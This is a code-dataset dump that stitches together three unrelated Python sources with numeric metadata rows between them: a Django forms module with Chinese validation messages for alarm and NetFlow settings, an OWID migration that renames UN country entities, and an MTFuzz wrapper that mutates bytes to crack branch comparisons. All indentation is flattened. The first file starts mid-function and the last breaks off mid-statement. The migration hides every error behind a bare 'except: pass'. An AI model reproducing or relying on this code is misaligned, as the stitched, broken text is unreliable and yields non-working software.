if (cpu_threshold and cpu_alarm_interval) >= 1:
pass
elif cpu_threshold == 0 and cpu_alarm_interval == 0:
pass
else:
raise forms.ValidationError("CPU阈值与告警周期,要么都设置,要么都保持默认的0!不能只设置其中一个!")
def clean_mem_alarm_interval(self):
mem_threshold = int(self.cleaned_data['mem_threshold'])
mem_alarm_interval = int(self.cleaned_data['mem_alarm_interval'])
if (mem_threshold and mem_alarm_interval) >= 1:
pass
elif mem_threshold == 0 and mem_alarm_interval == 0:
pass
else:
raise forms.ValidationError("内存阈值与告警周期,要么都设置,要么都保持默认的0!不能只设置其中一个!")
def clean_utilization_alarm_interval(self):
utilization_threshold = int(self.cleaned_data['utilization_threshold'])
utilization_alarm_interval = int(self.cleaned_data['utilization_alarm_interval'])
if (utilization_threshold and utilization_alarm_interval) >= 1:
pass
elif utilization_threshold == 0 and utilization_alarm_interval == 0:
pass
else:
raise forms.ValidationError("利用率阈值与告警周期,要么都设置,要么都保持默认的0!不能只设置其中一个!")
def clean_mailto(self):
mailserver = self.cleaned_data['mailserver']
mailusername = self.cleaned_data['mailusername']
mailpassword = self.cleaned_data['mailpassword']
mailfrom = self.cleaned_data['mailfrom']
mailto = self.cleaned_data['mailto']
if mailserver and mailusername and mailpassword and mailfrom and mailto:
pass
elif not mailserver and not mailusername and not mailpassword and not mailfrom and not mailto:
pass
else:
raise forms.ValidationError("邮件信息要么全部设置!要么全部保持空!不能只设置其中的一部分!")
class NetFlowProtocol(forms.Form):
# 如果希望出现必选左边的红色星标 ,必须配置下面的内容,并且在HTML中还要配置CSS
required_css_class = 'required'
protocol_regex = RegexValidator(regex=r'^\d.*',
message="协议号直接填写数字")
protocol_type_regex = RegexValidator(regex=r'[A-Z0-9_]+',
message="协议类型格式:IPV4_SRC_ADDR ")
protocol_number = forms.CharField(validators=[protocol_regex],
min_length=1,
max_length=6,
label='协议号',
required=True,
widget=forms.NumberInput(attrs={"class": "form-control"}))
field_types = forms.CharField(validators=[protocol_type_regex],
min_length=1,
max_length=100,
label='协议类型',
required=True,
widget=forms.TextInput(attrs={"class": "form-control"}))
def clean_protocol_number(self):
protocol_number = self.cleaned_data['protocol_number']
# 在数据库中查找是否存在这个协议号,exists():判断查询集中是否有数据,如果有就返回true,没有返回false
existing = FieldTypeMap.objects.filter(field_id=protocol_number).exists()
# 如果存在就显示校验错误信息
if existing:
raise forms.ValidationError("协议号不能重复")
# 如果校验成功就返回协议号
return protocol_number
def clean_field_types(self):
field_types = self.cleaned_data['field_types']
# 在数据库中查找是否存在这个协议类型,exists():判断查询集中是否有数据,如果有就返回true,没有返回false
existing = FieldTypeMap.objects.filter(field_name=field_types).exists()
# 如果存在就显示校验错误信息
if existing:
raise forms.ValidationError("协议类型不能重复")
# 如果校验成功就返回协议类型
return field_types
class NetFlowApplication(forms.Form):
# 如果希望出现必选左边的红色星标 ,必须配置下面的内容,并且在HTML中还要配置CSS
required_css_class = 'required'
pro_dst_post_regex = RegexValidator(regex=r'\d\/\d',
message="格式:17/443 ")
application_regex = RegexValidator(regex=r'[A-Za-z]+',
message="格式:HTTPS ")
pro_dst_post = forms.CharField(validators=[pro_dst_post_regex],
min_length=1,
max_length=100,
label='协议/目的端口',
required=True,
widget=forms.TextInput(attrs={"class": "form-control"}))
application_name = forms.CharField(validators=[application_regex],
min_length=1,
max_length=100,
label='应用名',
required=True,
widget=forms.TextInput(attrs={"class": "form-control"}))
def clean_pro_dst_post(self):
pro_dst_post = self.cleaned_data['pro_dst_post']
# 在数据库中查找是否存在这个协议端口号,exists():判断查询集中是否有数据,如果有就返回true,没有返回false
existing = ApplicationMap.objects.filter(pro_dst_port=pro_dst_post).exists()
# 如果存在就显示校验错误信息
if existing:
raise forms.ValidationError("协议和端口号不能重复")
# 如果校验成功就返回协议端口号
return pro_dst_post
# 由于采用的是协议/目的端口号组合,可能一个应用使用不同端口号,所以这里暂时注释!
# def clean_application_name(self):
# application_name = self.cleaned_data['application_name']
# # 在数据库中查找是否存在这个应用类型,exists():判断查询集中是否有数据,如果有就返回true,没有返回false
# existing = ApplicationMap.objects.filter(application_name=application_name).exists()
# # 如果存在就显示校验错误信息
# if existing:
# raise forms.ValidationError("应用类型不能重复")
# # 如果校验成功就返回应用类型
# return application_name
class UserForm(forms.Form):
username = forms.CharField(max_length=30)
password = forms.CharField(max_length=50)
password2 = forms.CharField(max_length=50)
email = forms.EmailField(max_length=50)
class loginForm(forms.Form):
username = forms.CharField(max_length=30)
password = forms.CharField(max_length=50)
| 47.025335
| 109
| 0.497053
| 2,608
| 31,554
| 5.833589
| 0.11388
| 0.048442
| 0.059813
| 0.08972
| 0.803799
| 0.775141
| 0.767451
| 0.746944
| 0.712699
| 0.631326
| 0
| 0.010822
| 0.399664
| 31,554
| 670
| 110
| 47.095522
| 0.792324
| 0.072923
| 0
| 0.707317
| 0
| 0
| 0.113464
| 0.02423
| 0
| 0
| 0
| 0
| 0
| 1
| 0.030488
| false
| 0.063008
| 0.006098
| 0
| 0.29878
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
|
0
| 8
|
0d506b9ee549a00243ad9bcf2fbfbe780db8c1dd
| 17,146
|
py
|
Python
|
grapher_admin/migrations/0010_auto_20170911_1454.py
|
stjordanis/owid-importer
|
4341713d7fa88b41327ea48419ed5785b5cb9faf
|
[
"MIT"
] | 15
|
2018-12-07T06:11:49.000Z
|
2022-01-24T03:38:05.000Z
|
grapher_admin/migrations/0010_auto_20170911_1454.py
|
stjordanis/owid-importer
|
4341713d7fa88b41327ea48419ed5785b5cb9faf
|
[
"MIT"
] | 10
|
2020-04-05T01:08:27.000Z
|
2022-02-17T23:54:13.000Z
|
grapher_admin/migrations/0010_auto_20170911_1454.py
|
stjordanis/owid-importer
|
4341713d7fa88b41327ea48419ed5785b5cb9faf
|
[
"MIT"
] | 6
|
2018-11-03T09:14:58.000Z
|
2021-05-17T21:59:59.000Z
|
# -*- coding: utf-8 -*-
# Generated by Django 1.11 on 2017-09-11 14:54
from __future__ import unicode_literals
from django.db import migrations
def standardize_long_unwpp_country_names(apps, schema_editor):
try:
Entity = apps.get_model('grapher_admin', 'Entity')
Entity.objects.filter(name='Serbia, Including Kosovo.').update(name='Serbia (including Kosovo)')
Entity.objects.filter(name='Guadeloupe, Including Saint-Barthélemy and Saint-Martin (French part).').update(name='Guadeloupe (including Saint-Barthélemy and Saint-Martin)')
DataValue = apps.get_model('grapher_admin', 'DataValue')
DataValue.objects.filter(fk_ent_id=Entity.objects.get(name='More developed regions, More developed regions comprise Europe, Northern America, Australia/New Zealand and Japan.').pk).update(fk_ent_id=Entity.objects.get(name='More developed regions').pk)
Entity.objects.get(name='More developed regions, More developed regions comprise Europe, Northern America, Australia/New Zealand and Japan.').delete()
DataValue.objects.filter(fk_ent_id=Entity.objects.get(
name='Less developed regions, Less developed regions comprise all regions of Africa, Asia (except Japan), Latin America and the Caribbean plus Melanesia, Micronesia and Polynesia.').pk).update(
fk_ent_id=Entity.objects.get(name='Less developed regions').pk)
Entity.objects.get(
name='Less developed regions, Less developed regions comprise all regions of Africa, Asia (except Japan), Latin America and the Caribbean plus Melanesia, Micronesia and Polynesia.').delete()
DataValue.objects.filter(fk_ent_id=Entity.objects.get(
name='Least developed countries, The group of least developed countries, as defined by the United Nations General Assembly in its resolutions (59/209, 59/210, 60/33, 62/97, 64/L.55, 67/L.43, 64/295 and 68/18) included 47 countries in June 2017: 33 in Africa,').pk).update(
fk_ent_id=Entity.objects.get(name='Least developed countries').pk)
Entity.objects.get(
name='Least developed countries, The group of least developed countries, as defined by the United Nations General Assembly in its resolutions (59/209, 59/210, 60/33, 62/97, 64/L.55, 67/L.43, 64/295 and 68/18) included 47 countries in June 2017: 33 in Africa,').delete()
DataValue.objects.filter(fk_ent_id=Entity.objects.get(
name='Less developed regions, excluding least developed countries, Other less developed countries comprise the less developed regions excluding the least developed countries.').pk).update(
fk_ent_id=Entity.objects.get(name='Less developed regions, excluding least developed countries').pk)
Entity.objects.get(
name='Less developed regions, excluding least developed countries, Other less developed countries comprise the less developed regions excluding the least developed countries.').delete()
DataValue.objects.filter(fk_ent_id=Entity.objects.get(
name='High-income countries, The country classification by income level is based on 2016 GNI per capita from the World Bank.').pk).update(
fk_ent_id=Entity.objects.get(name='High-income countries').pk)
Entity.objects.get(
name='High-income countries, The country classification by income level is based on 2016 GNI per capita from the World Bank.').delete()
DataValue.objects.filter(fk_ent_id=Entity.objects.get(
name='Middle-income countries, The country classification by income level is based on 2016 GNI per capita from the World Bank.').pk).update(
fk_ent_id=Entity.objects.get(name='Middle-income countries').pk)
Entity.objects.get(
name='Middle-income countries, The country classification by income level is based on 2016 GNI per capita from the World Bank.').delete()
DataValue.objects.filter(fk_ent_id=Entity.objects.get(
name='Upper-middle-income countries, The country classification by income level is based on 2016 GNI per capita from the World Bank.').pk).update(
fk_ent_id=Entity.objects.get(name='Upper-middle-income countries').pk)
Entity.objects.get(
name='Upper-middle-income countries, The country classification by income level is based on 2016 GNI per capita from the World Bank.').delete()
DataValue.objects.filter(fk_ent_id=Entity.objects.get(
name='Lower-middle-income countries, The country classification by income level is based on 2016 GNI per capita from the World Bank.').pk).update(
fk_ent_id=Entity.objects.get(name='Lower-middle-income countries').pk)
Entity.objects.get(
name='Lower-middle-income countries, The country classification by income level is based on 2016 GNI per capita from the World Bank.').delete()
DataValue.objects.filter(fk_ent_id=Entity.objects.get(
name='Low-income countries, The country classification by income level is based on 2016 GNI per capita from the World Bank.').pk).update(
fk_ent_id=Entity.objects.get(name='Low-income countries').pk)
Entity.objects.get(
name='Low-income countries, The country classification by income level is based on 2016 GNI per capita from the World Bank.').delete()
DataValue.objects.filter(fk_ent_id=Entity.objects.get(
name='Sub-Saharan Africa, Sub-Saharan Africa refers to all of Africa except Northern Africa.').pk).update(
fk_ent_id=Entity.objects.get(name='Sub-Saharan Africa').pk)
Entity.objects.get(
name='Sub-Saharan Africa, Sub-Saharan Africa refers to all of Africa except Northern Africa.').delete()
DataValue.objects.filter(fk_ent_id=Entity.objects.get(
name='Mauritius, Including Agalega, Rodrigues and Saint Brandon.').pk).update(
fk_ent_id=Entity.objects.get(name='Mauritius').pk)
Entity.objects.get(
name='Mauritius, Including Agalega, Rodrigues and Saint Brandon.').delete()
DataValue.objects.filter(fk_ent_id=Entity.objects.get(
name='United Republic of Tanzania, Including Zanzibar.').pk).update(
fk_ent_id=Entity.objects.get(name='Tanzania').pk)
Entity.objects.get(
name='United Republic of Tanzania, Including Zanzibar.').delete()
DataValue.objects.filter(fk_ent_id=Entity.objects.get(
name='Western Africa, Including Saint Helena, Ascension, and Tristan da Cunha.').pk).update(
fk_ent_id=Entity.objects.get(name='Western Africa').pk)
Entity.objects.get(
name='Western Africa, Including Saint Helena, Ascension, and Tristan da Cunha.').delete()
DataValue.objects.filter(fk_ent_id=Entity.objects.get(
name='China, For statistical purposes, the data for China do not include Hong Kong and Macao, Special Administrative Regions (SAR) of China, and Taiwan Province of China.').pk).update(
fk_ent_id=Entity.objects.get(name='China').pk)
Entity.objects.get(
name='China, For statistical purposes, the data for China do not include Hong Kong and Macao, Special Administrative Regions (SAR) of China, and Taiwan Province of China.').delete()
DataValue.objects.filter(fk_ent_id=Entity.objects.get(
name='China, Hong Kong SAR, As of 1 July 1997, Hong Kong became a Special Administrative Region (SAR) of China.').pk).update(
fk_ent_id=Entity.objects.get(name='Hong Kong').pk)
Entity.objects.get(
name='China, Hong Kong SAR, As of 1 July 1997, Hong Kong became a Special Administrative Region (SAR) of China.').delete()
DataValue.objects.filter(fk_ent_id=Entity.objects.get(
name='China, Macao SAR, As of 20 December 1999, Macao became a Special Administrative Region (SAR) of China.').pk).update(
fk_ent_id=Entity.objects.get(name='Macao').pk)
Entity.objects.get(
name='China, Macao SAR, As of 20 December 1999, Macao became a Special Administrative Region (SAR) of China.').delete()
DataValue.objects.filter(fk_ent_id=Entity.objects.get(
name='China, Taiwan Province of China').pk).update(
fk_ent_id=Entity.objects.get(name='Taiwan').pk)
Entity.objects.get(
name='China, Taiwan Province of China').delete()
DataValue.objects.filter(fk_ent_id=Entity.objects.get(
name='South-Central Asia, The regions Southern Asia and Central Asia are combined into South-Central Asia.').pk).update(
fk_ent_id=Entity.objects.get(name='South-Central Asia').pk)
Entity.objects.get(
name='South-Central Asia, The regions Southern Asia and Central Asia are combined into South-Central Asia.').delete()
DataValue.objects.filter(fk_ent_id=Entity.objects.get(
name='Malaysia, Including Sabah and Sarawak.').pk).update(
fk_ent_id=Entity.objects.get(name='Malaysia').pk)
Entity.objects.get(
name='Malaysia, Including Sabah and Sarawak.').delete()
DataValue.objects.filter(fk_ent_id=Entity.objects.get(
name='Azerbaijan, Including Nagorno-Karabakh.').pk).update(
fk_ent_id=Entity.objects.get(name='Azerbaijan').pk)
Entity.objects.get(
name='Azerbaijan, Including Nagorno-Karabakh.').delete()
DataValue.objects.filter(fk_ent_id=Entity.objects.get(
name='Cyprus, Refers to the whole country.').pk).update(
fk_ent_id=Entity.objects.get(name='Cyprus').pk)
Entity.objects.get(
name='Cyprus, Refers to the whole country.').delete()
DataValue.objects.filter(fk_ent_id=Entity.objects.get(
name='Georgia, Including Abkhazia and South Ossetia.').pk).update(
fk_ent_id=Entity.objects.get(name='Georgia').pk)
Entity.objects.get(
name='Georgia, Including Abkhazia and South Ossetia.').delete()
DataValue.objects.filter(fk_ent_id=Entity.objects.get(
name='State of Palestine, Including East Jerusalem.').pk).update(
fk_ent_id=Entity.objects.get(name='Palestine').pk)
Entity.objects.get(
name='State of Palestine, Including East Jerusalem.').delete()
DataValue.objects.filter(fk_ent_id=Entity.objects.get(
name='Czechia').pk).update(
fk_ent_id=Entity.objects.get(name='Czech Republic').pk)
Entity.objects.get(
name='Czechia').delete()
DataValue.objects.filter(fk_ent_id=Entity.objects.get(
name='Republic of Moldova, Including Transnistria.').pk).update(
fk_ent_id=Entity.objects.get(name='Moldova').pk)
Entity.objects.get(
name='Republic of Moldova, Including Transnistria.').delete()
DataValue.objects.filter(fk_ent_id=Entity.objects.get(
name='Ukraine, Including Crimea.').pk).update(
fk_ent_id=Entity.objects.get(name='Ukraine').pk)
Entity.objects.get(
name='Ukraine, Including Crimea.').delete()
DataValue.objects.filter(fk_ent_id=Entity.objects.get(
name='Northern Europe, Including Faeroe Islands, and Isle of Man.').pk).update(
fk_ent_id=Entity.objects.get(name='Northern Europe').pk)
Entity.objects.get(
name='Northern Europe, Including Faeroe Islands, and Isle of Man.').delete()
DataValue.objects.filter(fk_ent_id=Entity.objects.get(
name='Channel Islands, Refers to Guernsey, and Jersey.').pk).update(
fk_ent_id=Entity.objects.get(name='Channel Islands').pk)
Entity.objects.get(
name='Channel Islands, Refers to Guernsey, and Jersey.').delete()
DataValue.objects.filter(fk_ent_id=Entity.objects.get(
name='Finland, Including Åland Islands.').pk).update(
fk_ent_id=Entity.objects.get(name='Finland').pk)
Entity.objects.get(
name='Finland, Including Åland Islands.').delete()
DataValue.objects.filter(fk_ent_id=Entity.objects.get(
name='Norway, Including Svalbard and Jan Mayen Islands.').pk).update(
fk_ent_id=Entity.objects.get(name='Norway').pk)
Entity.objects.get(
name='Norway, Including Svalbard and Jan Mayen Islands.').delete()
DataValue.objects.filter(fk_ent_id=Entity.objects.get(
name='Southern Europe, Including Andorra, Gibraltar, Holy See, and San Marino.').pk).update(
fk_ent_id=Entity.objects.get(name='Southern Europe').pk)
Entity.objects.get(
name='Southern Europe, Including Andorra, Gibraltar, Holy See, and San Marino.').delete()
DataValue.objects.filter(fk_ent_id=Entity.objects.get(
name='Spain, Including Canary Islands, Ceuta and Melilla.').pk).update(
fk_ent_id=Entity.objects.get(name='Spain').pk)
Entity.objects.get(
name='Spain, Including Canary Islands, Ceuta and Melilla.').delete()
DataValue.objects.filter(fk_ent_id=Entity.objects.get(
name='TFYR Macedonia, The former Yugoslav Republic of Macedonia.').pk).update(
fk_ent_id=Entity.objects.get(name='Macedonia').pk)
Entity.objects.get(
name='TFYR Macedonia, The former Yugoslav Republic of Macedonia.').delete()
DataValue.objects.filter(fk_ent_id=Entity.objects.get(
name='Western Europe, Including Liechtenstein, and Monaco.').pk).update(
fk_ent_id=Entity.objects.get(name='Western Europe').pk)
Entity.objects.get(
name='Western Europe, Including Liechtenstein, and Monaco.').delete()
DataValue.objects.filter(fk_ent_id=Entity.objects.get(
name='Caribbean, Including Anguilla, British Virgin Islands, Caribbean Netherlands, Cayman Islands, Dominica, Montserrat, Saint Kitts and Nevis, Sint Maarten (Dutch part) and Turks and Caicos Islands.').pk).update(
fk_ent_id=Entity.objects.get(name='Caribbean').pk)
Entity.objects.get(
name='Caribbean, Including Anguilla, British Virgin Islands, Caribbean Netherlands, Cayman Islands, Dominica, Montserrat, Saint Kitts and Nevis, Sint Maarten (Dutch part) and Turks and Caicos Islands.').delete()
DataValue.objects.filter(fk_ent_id=Entity.objects.get(
name='South America, Including Falkland Islands (Malvinas).').pk).update(
fk_ent_id=Entity.objects.get(name='South America').pk)
Entity.objects.get(
name='South America, Including Falkland Islands (Malvinas).').delete()
DataValue.objects.filter(fk_ent_id=Entity.objects.get(
name='NORTHERN AMERICA, Including Bermuda, Greenland, and Saint Pierre and Miquelon.').pk).update(
fk_ent_id=Entity.objects.get(name='Northern America').pk)
Entity.objects.get(
name='NORTHERN AMERICA, Including Bermuda, Greenland, and Saint Pierre and Miquelon.').delete()
DataValue.objects.filter(fk_ent_id=Entity.objects.get(
name='Australia, Including Christmas Island, Cocos (Keeling) Islands and Norfolk Island.').pk).update(
fk_ent_id=Entity.objects.get(name='Australia').pk)
Entity.objects.get(
name='Australia, Including Christmas Island, Cocos (Keeling) Islands and Norfolk Island.').delete()
DataValue.objects.filter(fk_ent_id=Entity.objects.get(
name='Polynesia, Including American Samoa, Cook Islands, Niue, Pitcairn, Tokelau, Tuvalu, and Wallis and Futuna Islands.').pk).update(
fk_ent_id=Entity.objects.get(name='Polynesia').pk)
Entity.objects.get(
name='Polynesia, Including American Samoa, Cook Islands, Niue, Pitcairn, Tokelau, Tuvalu, and Wallis and Futuna Islands.').delete()
Variable = apps.get_model('grapher_admin', 'Variable')
Dataset = apps.get_model('grapher_admin', 'Dataset')
DataValue.objects.filter(fk_var_id__in=Variable.objects.filter(fk_dst_id__in=Dataset.objects.filter(namespace='faostat')), fk_ent_id=Entity.objects.get(code='FSM').pk).update(fk_ent_id=Entity.objects.get(name='Micronesia, Including Marshall Islands, Nauru, Northern Mariana Islands, and Palau.').pk)
DataValue.objects.filter(fk_ent_id=Entity.objects.get(
name='Micronesia (Federated States of)').pk).update(
fk_ent_id=Entity.objects.get(code='FSM').pk)
Entity.objects.get(name='Micronesia (Federated States of)').delete()
Entity.objects.filter(code='FSM').update(name='Micronesia (country)')
Entity.objects.filter(name='Micronesia, Including Marshall Islands, Nauru, Northern Mariana Islands, and Palau.').update(name='Micronesia (region)')
except Exception:
pass
class Migration(migrations.Migration):
dependencies = [
('grapher_admin', '0009_fix_map_colorSchemeValuesAutomatic'),
]
operations = [
migrations.RunPython(standardize_long_unwpp_country_names),
]
| 63.269373
| 308
| 0.687216
| 2,257
| 17,146
| 5.13292
| 0.125388
| 0.14139
| 0.168494
| 0.207164
| 0.938714
| 0.918861
| 0.916789
| 0.911351
| 0.872335
| 0.795425
| 0
| 0.012248
| 0.199988
| 17,146
| 270
| 309
| 63.503704
| 0.832325
| 0.003849
| 0
| 0.353211
| 1
| 0.119266
| 0.456696
| 0.002284
| 0
| 0
| 0
| 0
| 0
| 1
| 0.004587
| false
| 0.004587
| 0.009174
| 0
| 0.027523
| 0
| 0
| 0
| 0
| null | 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
3712e2790ede15914676759fb1acac7e00dc84c2
| 74,689
|
py
|
Python
|
fuzzers/MTFuzz/mtfuzz-crack-off/mtfuzz_wrapper.py
|
PoShaung/program-smoothing-fuzzing
|
60d1c2cd1ee460dcc6facdab92e96df7f44fdb3a
|
[
"Apache-2.0"
] | 1
|
2022-03-08T20:13:00.000Z
|
2022-03-08T20:13:00.000Z
|
fuzzers/MTFuzz/mtfuzz-crack-off/mtfuzz_wrapper.py
|
PoShaung/program-smoothing-fuzzing
|
60d1c2cd1ee460dcc6facdab92e96df7f44fdb3a
|
[
"Apache-2.0"
] | null | null | null |
fuzzers/MTFuzz/mtfuzz-crack-off/mtfuzz_wrapper.py
|
PoShaung/program-smoothing-fuzzing
|
60d1c2cd1ee460dcc6facdab92e96df7f44fdb3a
|
[
"Apache-2.0"
] | null | null | null |
import subprocess
import sys
import math
import shutil
import subprocess
import glob
# import ipdb
import pickle
import os
import numpy as np
import struct
import time
FNULL = open(os.devnull, 'w')
mut_cnt = 0
'''
def train(x, y):
model = Sequential()
model.add(Dense(8, input_dim=x.shape[1]))
#model.add(Dense(32, input_dim=x.shape[1]))
model.add(Dense(1))
opt = keras.optimizers.adam(lr=0.01)
model.compile(loss='mse', optimizer=opt)
save_best = keras.callbacks.ModelCheckpoint("best_w.h5", monitor='loss', verbose=0, save_best_only=True, save_weights_only=True, mode='min', period=1)
model.fit(x, y, epochs=50, batch_size=int(x.shape[0]/32), verbose=0, callbacks=[save_best])
model.load_weights("best_w.h5")
layer_list = [(layer.name, layer) for layer in model.layers]
loss = layer_list[-1][1].output[:, 0]
grads = K.gradients(loss, model.input)[0]
iterate = K.function([model.input], [loss, grads])
loss_value, grads_value = iterate([x[0:1]])
idx = np.flip(np.argsort(np.absolute(grads_value), axis=1)[:, -x.shape[1]:].reshape((x.shape[1],)), 0)[:1000]
return idx
'''
check_out = subprocess.check_output
# find unexplored branches
def find_unexplored_br(unexplored_1,unexplored_2, explored, seeds,tmp_argvv, argvv):
global mut_cnt
strcmp_cnt = 0
tmp_argvv[6] = argvv[6] + '_br'
for seed_id,seed in enumerate(seeds):
out = ''
try:
# todo: add crach check for afl-showbr.
out = check_out(['./afl-showbr', '-q', '-o', '/dev/stdout', '-m', '1024', '-t', '500'] + tmp_argvv[6:-1] + [seed])
except subprocess.CalledProcessError:
try:
out = check_out(['./afl-showbr', '-q', '-o', '/dev/stdout', '-m', '1024', '-t', '5000'] + tmp_argvv[6:-1] + [seed])
except subprocess.CalledProcessError:
print("### found a crash ")
shutil.copyfile(seed, "./crashes/id_0_0_"+str(mut_cnt))
mut_cnt = mut_cnt + 1
continue
for line in out.splitlines():
tokens = line.split(b':')
if len(tokens) == 2:
edge = int(tokens[0])
hit = int(tokens[1])
if hit == 3:
if edge not in explored:
explored.append(edge)
if edge in unexplored_1:
del unexplored_1[edge]
if edge in unexplored_2:
del unexplored_2[edge]
elif hit == 1:
# if edge is explored before, skip it.
if edge in explored:
continue
# if edge is not in explored_1, add to unexplored_1/ append
if edge not in unexplored_1:
unexplored_1[edge] = [seed_id]
else:
unexplored_1[edge].append(seed_id)
# if edge is in explored_2, set it explored
if edge in unexplored_2:
del unexplored_2[edge]
del unexplored_1[edge]
explored.append(edge)
elif hit == 2:
# if edge is explored before, skip it.
if edge in explored:
continue
# if edge is not in explored_1, add to unexplored_1/ append
if edge not in unexplored_2:
unexplored_2[edge] = [seed_id]
else:
unexplored_2[edge].append(seed_id)
# if edge is in explored_2, set it explored
if edge in unexplored_1:
del unexplored_1[edge]
del unexplored_2[edge]
explored.append(edge)
if len(tokens) == 3:
edge = int(tokens[0])
hit = int(tokens[1])
lenn = int(tokens[2])
if hit == 3:
if edge not in explored:
explored.append(edge)
if edge in unexplored_1:
del unexplored_1[edge]
if edge in unexplored_2:
del unexplored_2[edge]
elif hit == 1:
# if edge is explored before, skip it.
if edge in explored:
continue
# if edge is not in explored_1, add to unexplored_1/ append
if edge not in unexplored_1:
unexplored_1[edge] = [(seed_id, lenn)]
else:
unexplored_1[edge].append((seed_id, lenn))
# if edge is in explored_2, set it explored
if edge in unexplored_2:
del unexplored_2[edge]
del unexplored_1[edge]
explored.append(edge)
elif hit == 2:
# if edge is explored before, skip it.
if edge in explored:
continue
# if edge is not in explored_1, add to unexplored_1/ append
if edge not in unexplored_2:
unexplored_2[edge] = [(seed_id, lenn)]
else:
unexplored_2[edge].append((seed_id, lenn))
# if edge is in explored_2, set it explored
if edge in unexplored_1:
del unexplored_1[edge]
del unexplored_2[edge]
explored.append(edge)
print(seed_id, len(unexplored_1) + len(unexplored_2), len(explored))
# set the seed with proper size at the head of list
for k,v in unexplored_1.items():
if not isinstance(v[0], tuple):
tmp_len = os.stat(seeds[v[0]]).st_size
for ele in v:
f_name = seeds[ele]
f_len = os.stat(f_name).st_size
if f_len > tmp_len:
v[0] = ele
else:
tmp_len = os.stat(seeds[v[0][0]]).st_size
for ele in v:
f_name = seeds[ele[0]]
f_len = os.stat(f_name).st_size
if f_len > tmp_len:
v[0] = ele
# for each unexplored CMP-based branch, mutate hot bytes with intecepted operands
# (TODO: clean this function, many duplicated code logic)
def crack(tmp_argvv, argvv):
magic_dict = {}
#possible_val = [1,3,7,15,31,63,127,255]
#possible_val = [3,12,48,192]
possible_val = [15, 240]
if os.path.isdir("./tmp_train/") == False:
os.makedirs('./tmp_train')
if os.path.isdir("./tmp_non_direct/") == False:
os.makedirs('./tmp_non_direct')
if os.path.exists('./br_log'):
magic_dict = pickle.load(open("br_log", 'rb'))
else:
br_log_name = argvv[6] + '_br_log'
with open(br_log_name, 'r') as f:
lines = f.read().splitlines()
for line in lines:
tokens = line.split(' ')
br_id = int(tokens[2])
br_type = int(tokens[4])
constant_loc = int(tokens[6])
constant_val = tokens[8]
lenn = int(tokens[10])
if br_id not in magic_dict:
magic_dict[br_id] = (br_type, constant_loc, constant_val, lenn)
pickle.dump(magic_dict, open('br_log', 'wb'))
# read mut_cnt counter
global mut_cnt
with open("mut_cnt", 'r') as f:
mut_cnt = int(f.read())
# obtain unexplored branches
unexplored_1 = {}
unexplored_2 = {}
explored = []
seeds = glob.glob("seeds/*")
seeds.sort()
find_unexplored_br(unexplored_1, unexplored_2, explored, seeds,tmp_argvv, argvv)
if os.path.exists("crack_failed"):
crack_failed_but_I_tried = pickle.load(open("crack_failed","rb"))
else:
crack_failed_but_I_tried = []
# concatenate two dicts
unexplored_1.update(unexplored_2)
unexplored = unexplored_1
del unexplored[0]
#pickle.dump(unexplored, open('tmp_unexplored','wb'))
#unexplored = pickle.load(open('tmp_unexplored','rb'))
# k==br_id, v==seed_id
for k,v in unexplored.items():
if k in crack_failed_but_I_tried:
continue
crack_bool = False
# parse branch information from magic_dict (from static analysis LLVM)
(br_type, constant_loc, constant_magic, lenn) = magic_dict[k]
#if br_type != 2 and br_type != 7 and br_type != 11:
#if br_type != 10 and br_type != 12:# and br_type != 11:
# continue
if br_type == 0 or br_type == 1:
seed_id = v[0]
init_seed = bytearray(open(seeds[seed_id],'rb').read())
print("br id: " + str(k) + " br len: " + str(lenn) + " br type: " + str(br_type) + " magic: " + constant_magic + " magic_loc: " + str(constant_loc) + " file len: " + str(len(init_seed)))
# clean tmp dir
for f in glob.glob("./tmp_train/*"):
os.remove(f)
# create baseline file
with open("./tmp_train/"+str("121212"),'wb') as f:
f.write(init_seed)
# generate sample inputs
for i in range(len(init_seed)):
tmp_seed = init_seed.copy()
for val in possible_val:
tmp_seed[i] = val
with open("./tmp_train/"+str(i)+"_"+str(val),'wb') as f:
f.write(tmp_seed)
# parse variable values for each sample inputs
tmp_argvv[6] = argvv[6] + '_br_fast'
pro = subprocess.run(['./obtain_br','-i','tmp_train', '-o', './tmp_train', '-l', str(len(init_seed)), '-t', str(k)] + tmp_argvv[6:], stdout=subprocess.PIPE, stderr=subprocess.PIPE, encoding="utf-8", errors='ignore')
line = pro.stdout
lines = line[line.find('###$$$ obtain br')+18:].split('\n')[:-1]
tmp_dict = {}
# parse result
for line in lines:
tokens = line.split(':')
tokens2 = tokens[1].split(' ')
tmp_dict[tokens[0]] = [int(tokens2[0]), int(tokens2[1])]
if '121212' not in tmp_dict:
continue
init_op1 = tmp_dict['121212'][0]
init_op2 = tmp_dict['121212'][1]
init_distance = tmp_dict['121212'][0] - tmp_dict['121212'][1]
hot_offsets = []
min_dist = float('inf')
file_name = ''
# no magic constant case
if constant_loc == 0:
# parse hot bytes
for offset, ops in tmp_dict.items():
distance = ops[0] - ops[1]
if ops[0] != init_op1 or ops[1] != init_op2:
# choose the optimal seed as starting point
if abs(distance) < min_dist:
min_dist = abs(distance)
file_name = offset
loc_offset = int(offset.split('_')[0])
if loc_offset not in hot_offsets:
hot_offsets.append(loc_offset)
if (distance > 0 and init_distance <= 0) or (distance <= 0 and init_distance > 0):
print("###crack branch " + str(k) + " br_tyte "+ str(br_type) + " constant_loc " + str(constant_loc))
shutil.copyfile("./tmp_train/"+str(offset), "./seeds/id_0_"+str(k)+"_"+str(mut_cnt))
mut_cnt = mut_cnt + 1
crack_bool = True
break
# crack success, skip to next branch
if crack_bool:
continue
# no hot byte candidates, skip
if len(hot_offsets)==0:
continue
# generate possible candidtate inputs to crack the branch
init_seed = bytearray(open('./tmp_train/'+file_name,'rb').read())
for f in glob.glob("./tmp_non_direct/*"):
os.remove(f)
for hot_offset in hot_offsets[:64]:
tmp_seed = init_seed.copy()
for val in range(255):
tmp_seed[hot_offset] = val
with open("./tmp_non_direct/"+str(hot_offset)+"_"+str(val),'wb') as f:
